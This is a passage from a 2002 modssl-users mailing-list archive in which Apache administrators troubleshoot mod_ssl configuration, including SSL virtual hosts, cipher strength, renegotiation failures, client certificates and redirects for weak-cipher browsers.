	from cairu.terra.com.br id QAA17566; Sat, 17 Aug 2002 16:29:30 +0200 (MET DST)
Received: from smtp4-poa.terra.com.br (smtp4-poa.terra.com.br [200.176.3.35])
	by cairu.terra.com.br (Postfix) with ESMTP
	id B459B4724C; Sat, 17 Aug 2002 11:29:26 -0300 (EST)
Received: from spiff.ddns.info (unknown [200.203.68.1])
	(authenticated user iuri.f)
	by smtp4-poa.terra.com.br (Postfix) with ESMTP
	id 7DD46AC59B; Sat, 17 Aug 2002 11:29:24 -0300 (EST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: Iuri Fiedoruk 
Organization: IndexZero
To: modssl-users@modssl.org, Cliff Woolley 
Subject: Re: mod_sll   virtual hosts
Date: Sat, 17 Aug 2002 11:26:39 -0300
User-Agent: KMail/1.4.2
References: 
In-Reply-To: 
MIME-Version: 1.0
Message-Id: <200208171126.39370.iuri.f@terra.com.br>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA17614
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Iuri Fiedoruk 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Em Sab 17 Ago 2002 11:21, Cliff Woolley escreveu:
> On Sat, 17 Aug 2002, Ron Ridley wrote:
> > Try something like this using IP based virtual hosts: Each one of your
> > virtual hosts can have different SSL key material it points to.
> > #------------ This section only goes in the conf file once
> > --------------------- Port 80
> > ServerName domain.com
> > NameVirtualHost x.x.x.x
> > #--------------------- Domain.com -------------------------
> > 
>
> Um, if I'm following this discussion correctly, I believe this advice is
> mistaken.  NameVirtualHost's can *NOT* be used with SSL.  Every name-based
> vhost would in reality get the certificate of the first one listed in the
> config file.
>
> Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#ToC47 .
>

Hum, but in case all the virtualhosts are related (as in my case) this would 
not matter much.
But in case not, this would be a really problem.
Thanks for your advice.

>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Iuri Fiedoruk
Santa Maria, RS, Brazil

GnuPG Key fingerprint = 9D5F 7FA6 EF2C 6A5E 914F  E01B 9434 AA7D 032B 240F
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug 18 03:42:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA29162; Sun, 18 Aug 2002 03:41:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from gristlepit.com id DAA29158; Sun, 18 Aug 2002 03:40:38 +0200 (MET DST)
Received: (qmail 26142 invoked from network); 18 Aug 2002 01:40:35 -0000
Received: from unknown (HELO 24.167.48.176) (216.118.56.26)
  by gristlepit.com with SMTP; 18 Aug 2002 01:40:35 -0000
Message-ID: 
X-Mailer: BasiliX 1.1.0 -- http://basilix.org
X-SenderIP: 24.167.48.176
Date: Sat, 17 Aug 2002 20:40:35 CDT
From: Ron Ridley 
Subject: Re: mod_sll   virtual hosts
To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ron Ridley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My mistake.  I have an entry NameVirtualHost but it is in the form of NameVirtualHost ip.address.of.host probably left over from some testing.  It works for me (as is) which is why I left it in the example.

My apologies.

-Ron

On 17 Aug 2002 14:31 CDT you wrote:

> Em Sab 17 Ago 2002 11:21, Cliff Woolley escreveu:
> > On Sat, 17 Aug 2002, Ron Ridley wrote:
> > > Try something like this using IP based virtual hosts: Each one of your
> > > virtual hosts can have different SSL key material it points to.
> > > #------------ This section only goes in the conf file once
> > > --------------------- Port 80
> > > ServerName domain.com
> > > NameVirtualHost x.x.x.x
> > > #--------------------- Domain.com -------------------------
> > > 
> >
> > Um, if I'm following this discussion correctly, I believe this advice is
> > mistaken.  NameVirtualHost's can *NOT* be used with SSL.  Every name-based
> > vhost would in reality get the certificate of the first one listed in the
> > config file.
> >
> > Please see http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#ToC47 .
> >
> 
> Hum, but in case all the virtualhosts are related (as in my case) this would 
> not matter much.
> But in case not, this would be a really problem.
> Thanks for your advice.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug 18 07:39:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA03025; Sun, 18 Aug 2002 07:38:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bh1.mailerator.com id HAA03021; Sun, 18 Aug 2002 07:37:47 +0200 (MET DST)
Received: from [64.165.226.100] (HELO rk1.la0.iohost.com)
  by bh1.mailerator.com (CommuniGate Pro SMTP 3.5.9)
  with ESMTP id 46498467; Sat, 17 Aug 2002 22:37:25 -0700
Content-Type: text/plain;
  charset="iso-8859-1"
From: Randy Katz 
Organization: CCSALES
To: modssl-users@modssl.org, "Jindo" 
Subject: Re: Is OpenSSL + ModSSL 128 bit encryption capable?
Date: Sat, 17 Aug 2002 22:37:37 -0700
User-Agent: KMail/1.4.1
References: <000401c245ef$097a8580$b117db3d@jindosoul>
In-Reply-To: <000401c245ef$097a8580$b117db3d@jindosoul>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200208172237.37827.randyk@ccsales.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Randy Katz 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes, it works.

On Saturday 17 August 2002 06:07, Jindo wrote:
> Good Day,
>
> My web server softwares are:
>
> - OpenSSL 0.96g
> - mod_ssl 2.8.10
> - Apache 1.26
>
> My ISP told me this combination could only support 40-bit cipher
> strength.  However, on mod_ssl official page, I did see:
>
>    128-bit strong cryptography world-wide
>
> In order to clarify this, would experienced modssl users confirm it for
> me that I could
>
> 1. Buy 128-bit certificate from CA
> 2. Install the CA on my server with the above configuration
> 3. Browser with 128-bit cipher strength may communicate with my server
> using 128-bit encryption.
>
> Thanks :-)
>
> Yours truly,
>
> Jindo
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
---
Take care,
Randy Katz
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Aug 18 21:50:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA16898; Sun, 18 Aug 2002 21:49:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id VAA16894; Sun, 18 Aug 2002 21:49:04 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id sestbaaa for modssl-users@modssl.org; Sun, 18 Aug 2002 21:48:49 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVIEG 2.1 bld 76) with SMTP id M2002081821484804933
 for ; Sun, 18 Aug 2002 21:48:48 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Sun, 18 Aug 2002 21:48:31 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2 Beta
Date: Sun, 18 Aug 2002 21:48:15 +0200
From: "Andre Schild" 
To: 
Subject: Antw: Re: How to upload to contribute section ?
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA16895
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sorry,

for Win32

André

>>> jwoolley@apache.org 15.08.2002 17:48:20 >>>
On Thu, 15 Aug 2002, Andre Schild wrote:

> I have binaries for apache 2.0.40 with openssl 0.9.6e.

For which OS?  Just curious.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 06:51:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA27198; Mon, 19 Aug 2002 06:50:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from selgw.esc.net.au id GAA27186; Mon, 19 Aug 2002 06:49:29 +0200 (MET DST)
Received: from wsjules2000 ([10.0.0.17])
	by selgw.esc.net.au (8.11.6/8.11.6) with ESMTP id g7J4w5x37286
	for ; Mon, 19 Aug 2002 14:28:07 +0930 (CST)
	(envelope-from jules@strategicecommerce.com.au)
From: "Jules Butcher" 
To: 
Subject: Re-negotiation handshake failed
Date: Mon, 19 Aug 2002 14:24:28 +0930
Message-ID: <001b01c2473c$80aebba0$1100000a@wsjules2000>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jules Butcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi All, I have recently upgraded our web server from NT/IIS to
FreeBSD/Apache/ModSSL. Everything is pretty sweet, execpt for one
application. The application (MessagingGW) is written in java using jsse
for the ssl stuff. The app periodically posts base64 encoded data to a
java servlet using http over ssl. MessagingGW seems to work fine when
the payload data is small, but over a certain size (a few kB) it bombs
out.

In this configuration I have Apache handling the SSL handshake, then
passing the request to tomcat via ajp13. Servlets generally seem to be
working fine over https, but in this case the servlet never receives the
request, which makes me think that the problem is between apache and the
client app.

If anyone has any clue about this, I would be very happy to hear from
you.


Server Software:
	Apache 1.3.26
	mod_ssl 2.8.10-1.3.26
	Tomcat 3.3.1

Client Software:
	Custom app (jdk1.3.1, jsse 1.0.2)


Below is the ssl_log file from the apache ssl log(I have replaced IP
addresses with [src-IP] and [dest-IP] below for my clients privacy):

[19/Aug/2002 13:04:35 98058] [info]  Connection to child 5 established
(server [dest-IP]:443, client [src-IP])
[19/Aug/2002 13:04:35 98058] [info]  Seeding PRNG with 0 bytes of
entropy
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Handshake: start
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: before/accept
initialization
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 write
certificate A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 write server
done A
[19/Aug/2002 13:04:35 98058] [trace] OpenSSL: Loop: SSLv3 flush data
[19/Aug/2002 13:04:37 98058] [trace] OpenSSL: Loop: SSLv3 read client
key exchange A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 read finished
A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 write change
cipher spec A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 write finished
A
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Loop: SSLv3 flush data
[19/Aug/2002 13:04:39 98058] [trace] Inter-Process Session Cache (DBM)
Expiry: old: 10, new: 6, removed: 4
[19/Aug/2002 13:04:39 98058] [trace] Inter-Process Session Cache:
request=SET status=OK
id=41131C9DCE1B61E17AF7997E89F58139BC5164A05AA734A9A70A39B065725CE0
timeout=596s (session caching)
[19/Aug/2002 13:04:39 98058] [trace] OpenSSL: Handshake: done
[19/Aug/2002 13:04:39 98058] [info]  Connection: Client IP: [src-IP],
Protocol: TLSv1, Cipher: RC4-SHA (128/128 bits)
[19/Aug/2002 13:04:41 98058] [info]  Initial (No.1) HTTPS request
received for child 5 (server [dest-IP]:443)
[19/Aug/2002 13:04:41 98058] [trace] Changed client verification type
will force renegotiation
[19/Aug/2002 13:04:41 98058] [info]  Requesting connection
re-negotiation
[19/Aug/2002 13:04:41 98058] [trace] Performing full renegotiation:
complete handshake protocol
[19/Aug/2002 13:04:41 98058] [trace] I/O: sucked 12556 bytes of input
data from SSL/TLS I/O layer for delayed injection into Apache I/O layer
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Handshake: start
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSL renegotiate
ciphers
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSLv3 write hello
request A
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSLv3 flush data
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: SSLv3 write hello
request C
[19/Aug/2002 13:04:41 98058] [info]  Awaiting re-negotiation handshake
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Handshake: start
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Loop: before accept
initialization
[19/Aug/2002 13:04:41 98058] [trace] Inter-Process Session Cache:
request=REM status=OK
id=41131C9DCE1B61E17AF7997E89F58139BC5164A05AA734A9A70A39B065725CE0
(session dead)
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Write: SSLv3 read client
hello B
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Exit: error in SSLv3 read
client hello B
[19/Aug/2002 13:04:41 98058] [error] Re-negotiation handshake failed:
Not accepted by client!?
[19/Aug/2002 13:04:41 98058] [trace] I/O: injecting 8192 bytes of
pre-sucked data into Apache I/O layer
[19/Aug/2002 13:04:41 98058] [trace] I/O: injecting 4364 bytes of
pre-sucked data into Apache I/O layer
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Write: SSLv3 read client
hello B
[19/Aug/2002 13:04:41 98058] [trace] OpenSSL: Exit: error in SSLv3 read
client hello B
[19/Aug/2002 13:04:41 98058] [error] SSL error on writing data (OpenSSL
library error follows)
[19/Aug/2002 13:04:41 98058] [error] OpenSSL: error:140940F5:SSL
routines:SSL3_READ_BYTES:unexpected record
[19/Aug/2002 13:04:41 98058] [info]  Connection to child 5 closed with
standard shutdown (server [dest-IP]:443, client [src-IP])

Regards, Jules Butcher

------------------------------------------------------

Software Developer
Strategic Ecommerce Ltd.

 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 06:59:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA27313; Mon, 19 Aug 2002 06:58:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp1.mts.net id GAA27307; Mon, 19 Aug 2002 06:58:03 +0200 (MET DST)
Received: from gimul (wnpgmb01dc6-res-49-208.mts.net [142.161.49.208])
	by smtp1.mts.net (8.11.4/8.11.3) with SMTP id g7J4vVX07638
	for ; Sun, 18 Aug 2002 23:57:32 -0500 (CDT)
Message-ID: <000b01c2473c$fb8a7440$c801a8c0@gimul>
From: "Paul F" 
To: "MODSSL" 
Subject: Changing dummy cetificates?
Date: Sun, 18 Aug 2002 23:57:53 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul F" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can anyone tell me how to change the dummy cert? I run gendummycerts again
but the old cert is still kept for apache.

Thanks!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 08:42:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA29209; Mon, 19 Aug 2002 08:41:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12707.mail.yahoo.com id IAA29205; Mon, 19 Aug 2002 08:40:14 +0200 (MET DST)
Message-ID: <20020819064013.2248.qmail@web12707.mail.yahoo.com>
Received: from [156.153.255.126] by web12707.mail.yahoo.com via HTTP; Sun, 18 Aug 2002 23:40:13 PDT
Date: Sun, 18 Aug 2002 23:40:13 -0700 (PDT)
From: Anbuchezhian Chelliah 
Subject: Re: SSL reverse proxy + Client Cert auth
To: modssl-users@modssl.org
In-Reply-To: <3D5CBA03.2080200@rdc.nl>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Danny,
   I guess I understood your doubt. If not, please
ignore this. There should be 'ca-bundle.crt' file in
which you can put the third party's certificate and
you could make a try.

Rgds,
Anbu

--- Danny Kruitbosch  wrote:
> Hi,
> 
> We want to build the following situation:
> 
> - Apache with mod_ssl as a reverse SSL proxy (Client
>  --->  SSL/HTTPS 
> ---> Rev. proxy ---> HTTP ---> Web/App server)
> - We need to check for client certificates. These
> certs are handed out 
> by another party (not a real TTP). We need to check
> the signature on the 
> client certs and the validity of the client certs.
> 
> 
> What's the best way to do this. I've read the
> mod_ssl manual, but I 
> don't understand how I can check client certs from
> another (third) party.
> 
> How do I setup Apache as an SSL reverse proxy?
> 
> Any help on this would be great!
> 
> Cheers,
> 
> Danny Kruitbosch
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 12:00:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA03916; Mon, 19 Aug 2002 11:59:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.p2.experian.nl id LAA03910; Mon, 19 Aug 2002 11:58:15 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by www.p2.experian.nl (Postfix) with ESMTP id 3ABB333D03
	for ; Mon, 19 Aug 2002 11:58:15 +0200 (CEST)
Received: from shivaya.namah.om (unknown [10.200.3.17])
	by www.p2.experian.nl (Postfix) with SMTP id 991672D390
	for ; Mon, 19 Aug 2002 11:58:12 +0200 (CEST)
Date: Mon, 19 Aug 2002 11:02:08 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: Directing users wihtou enough encryption capability
Message-Id: <20020819110208.09068214.jeroen@experian.nl>
Organization: Experian nederland b.v.
X-Mailer: Sylpheed version 0.7.5 (GTK+ 1.2.10; i586-mandrake-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by Experian Advanced Mail Virusscanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm trying to do the following:

I have a site with strong encryption, demanding 128 bit encryption with:
       SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128

A lot of users don't have browsers with 128 bits encryption capabilities, so wat I would to do is:

When a user cannot use 128 bits encryption, he/she should be redirected to a page with info about upgrading, in stead of just getting no connection.

Any idea how to do that?

Cheers,
Jeroen.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 13:25:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA06281; Mon, 19 Aug 2002 13:24:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.p2.experian.nl id NAA06275; Mon, 19 Aug 2002 13:23:53 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by www.p2.experian.nl (Postfix) with ESMTP id 6EA942DCDA
	for ; Mon, 19 Aug 2002 13:23:53 +0200 (CEST)
Received: from shivaya.namah.om (unknown [10.200.3.17])
	by www.p2.experian.nl (Postfix) with SMTP id 08FDF2DCC6
	for ; Mon, 19 Aug 2002 13:23:52 +0200 (CEST)
Date: Mon, 19 Aug 2002 12:27:47 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: redirecting users part 2
Message-Id: <20020819122747.37c00737.jeroen@experian.nl>
Organization: Experian nederland b.v.
X-Mailer: Sylpheed version 0.7.5 (GTK+ 1.2.10; i586-mandrake-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by Experian Advanced Mail Virusscanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm trying to redirect users who don't have enough encryption capabilities for 128 bit (see previous mail).

I've tried the following (but it doesn't work):


Add upgrade.html (the text users with old browsers are supposed to get) to index:

DirectoryIndex index.html index.htm Index.html Index.htm INDEX.HTML INDEX.HTM upgrade.html


Initiallay allow all strengths:

SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+SSLv2:+EXP:+eNULL

And then:


        SSLRequire %{SSL_CIPHER_USEKEYSIZE} < 128



        SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128


But it doesn't work, any idea why it doesn't work?

Cheers,
Jeroen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 14:03:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA06832; Mon, 19 Aug 2002 14:02:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.samsungcontact.com id OAA06821; Mon, 19 Aug 2002 14:01:34 +0200 (MET DST)
Received: from mail.samsungcontact.com (root@localhost)
	by mail.samsungcontact.com (8.11.6/8.11.6) with ESMTP id g7JC1YR29492
	for ; Mon, 19 Aug 2002 13:01:34 +0100
Received: from ravelox.co.uk (host195-89-159-62.uk.regusnet.com 195.89.159.62)
        by mail.samsungcontact.com (Samsung Contact SMTP Relay 7.1.0)
        via ESMTP; Mon, 19 Aug 2002 13:01:34 +0100 (BST)
Message-ID: <3D60DE16.6080200@ravelox.co.uk>
Date: Mon, 19 Aug 2002 13:01:26 +0100
From: Dave Kelly 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1a) Gecko/20020610
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Problems with Thawte freemail certificate and Apache
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Kelly 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I would appreciate any help on this please.

I am using Apache 1.3.23 on RedHat 7.3 with mod_ssl 2.8.7 and openssl 
0.9.6b-28.
This web server provides access to our internal Bugzilla database.

I have set up a CA on my server using /usr/share/ssl/misc/CA.pl and I 
issue browser certificates from it.

I have copied the CA certificate and appended it to 
/etc/httpd/conf/ssl.crt/ca-bundle.crt.

I have the following configuration in httpd.conf:


        Options ExecCGI FollowSymLinks
        SSLVerifyClient require
        SSLVerifyDepth  1
        SSLRequireSSL
        SSLRequire %{SSL_CLIENT_S_DN_OU} in {"Support", "Bugzilla"}


I have also uncommented:

SSLCACertificatePath /etc/httpd/conf/ssl.crt
SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca-bundle.crt

in httpd.conf.

I generated an Apache server certificate using

make testcert

in /etc/httpd/conf so that the correct machine name was in the CN attribute.

This is all working fine. However, my colleague and I both have Thawte 
freemail certificates installed and that's when we get a problem.

Using Mozilla with the configuration set to prompt for a certificate, 
both the browser certificate and the Thawte certificate are displayed 
with the Thawte certificate being listed first. If the configuration is 
set to automatically select a certificate, the Thawte certificate is 
chosen.
The behaviour is similar using IE.

The symptoms we see in Bugzilla is that we seem to be circulating 
through the same of 3-4 pages (depending upon what we choose).

The ssl_engine_log file shows:

[19/Aug/2002 12:35:23 01206] [error] Re-negotiation handshake failed: 
Not accepted by client!?
[19/Aug/2002 12:35:23 01206] [error] SSL error on writing data (OpenSSL 
library error follows)
[19/Aug/2002 12:35:23 01206] [error] OpenSSL: 
error:1409E0E5:lib(20):func(158):reason(229)


When we remove the Thawte certificate, everything works.

The Thawte certificate has no O or OU specified so why do the browsers 
find a match with it ?

Cheers

Dave.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 14:20:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA07461; Mon, 19 Aug 2002 14:19:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id OAA07457; Mon, 19 Aug 2002 14:18:25 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id OAA11783
	for ; Mon, 19 Aug 2002 14:18:21 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA07964
	for ; Mon, 19 Aug 2002 14:18:21 +0200 (MEST)
X-Authentication-Warning: gate0a.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: redirecting users part 2
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Mon, 19 Aug 2002 14:18:20 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8C44@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: redirecting users part 2
Thread-Index: AcJHczH5jcW/FpnkTyij/rNNji/f2QABdayg
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA07458
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I don't have the time to investigate this fully in the context of SSL but from a general understanding of how apache combines nested directives like this, I think you might need to change the order of the Location containers. The rules for combining directives are a bit complicated and (I have to say) not entirely well-documented. I think you need to consider the line in sections.html document (look for a link in docs from the  doc):

"... each group is processed in the order that they appear in the configuration files ..."

This would imply that apache loads the rule for /upgrade.html then overrides it with the rule for /. I am assuming here that "order" refers to the order in which apache reads data from the config during startup and not the order in which applies directives to incoming requests...

Confused? Me too...

Rgds,

Owen Boyle
>-----Original Message-----
>From: Jeroen Vriesman [mailto:jeroen@experian.nl]
>Sent: Montag, 19. August 2002 12:28
>To: modssl-users@modssl.org
>Subject: redirecting users part 2
>
>
>Hi,
>
>I'm trying to redirect users who don't have enough encryption 
>capabilities for 128 bit (see previous mail).
>
>I've tried the following (but it doesn't work):
>
>
>Add upgrade.html (the text users with old browsers are 
>supposed to get) to index:
>
>DirectoryIndex index.html index.htm Index.html Index.htm 
>INDEX.HTML INDEX.HTM upgrade.html
>
>
>Initiallay allow all strengths:
>
